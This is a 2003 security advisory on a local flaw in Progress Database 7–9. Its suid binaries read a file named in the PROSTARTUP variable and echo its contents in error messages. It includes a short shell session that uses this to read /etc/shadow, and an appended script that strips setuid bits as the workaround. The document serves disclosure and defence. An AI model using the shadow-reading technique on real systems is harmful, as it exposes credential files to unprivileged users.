Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-04-02-1735
Product                 : Progress Database
Version                 : Versions 7 to 9
Vendor                  : progress.com
Class                   : local
Criticality             : Medium to Low
Operating System(s)     : Linux, SunOS, SCO, TRU64, *nix


High Level Explanation
************************************************************************
High Level Description  : Error messages can provide root owned data
What to do              : chmod -s all suid binaries in /usr/dlc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed.
Low Level Description   :

The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running the program has
permission to read the configuration file. A user can simply specify a
root owned file and cause an error message to be generated to view the
file contents. Most versions beyond v6 appear to be affected.

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)
bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs
bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily, on the machine I chose to exploit, the line that was read from
the shadow file did not have an encrypted hash. This, however, is not
always the case.

Patch or Workaround     : chmod -s all suid binaries in the $DLC folder

Vendor Status           : vendor has been notified and is working on a fix

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
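
The workaround named in the advisory (chmod -s on the suid binaries under
the Progress install directory), written out as an added example that is
not part of the original advisory or of any vendor tooling. The function
names and the script name dlc_suid.sh are hypothetical; /usr/dlc is the
path the advisory gives.

```shell
#!/bin/sh
# Added example (not from the advisory): audit and strip setuid/setgid bits
# under a Progress install directory. /usr/dlc is the path the advisory names;
# pass your own $DLC path if the install lives elsewhere.

# Print every regular file under $1 that has the setuid or setgid bit set.
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Number of such files under $1.
count_suid() {
    list_suid "$1" | wc -l | tr -d ' '
}

# Log each affected file (ls -l, so the old mode can be restored later),
# clear both bits, then verify. Returns non-zero if any file keeps a bit.
strip_suid() {
    dir=$1
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -l {} \; -exec chmod ug-s {} \;
    [ "$(count_suid "$dir")" -eq 0 ]
}

# Usage (hypothetical script name):
#   sh dlc_suid.sh --audit [dir]   list only
#   sh dlc_suid.sh --fix   [dir]   apply the workaround
case "${1:-}" in
    --audit) list_suid "${2:-/usr/dlc}" ;;
    --fix)   strip_suid "${2:-/usr/dlc}" ;;
esac
```

Run --audit first and keep the ls -l output from --fix so the original
modes can be restored once the vendor fix is installed.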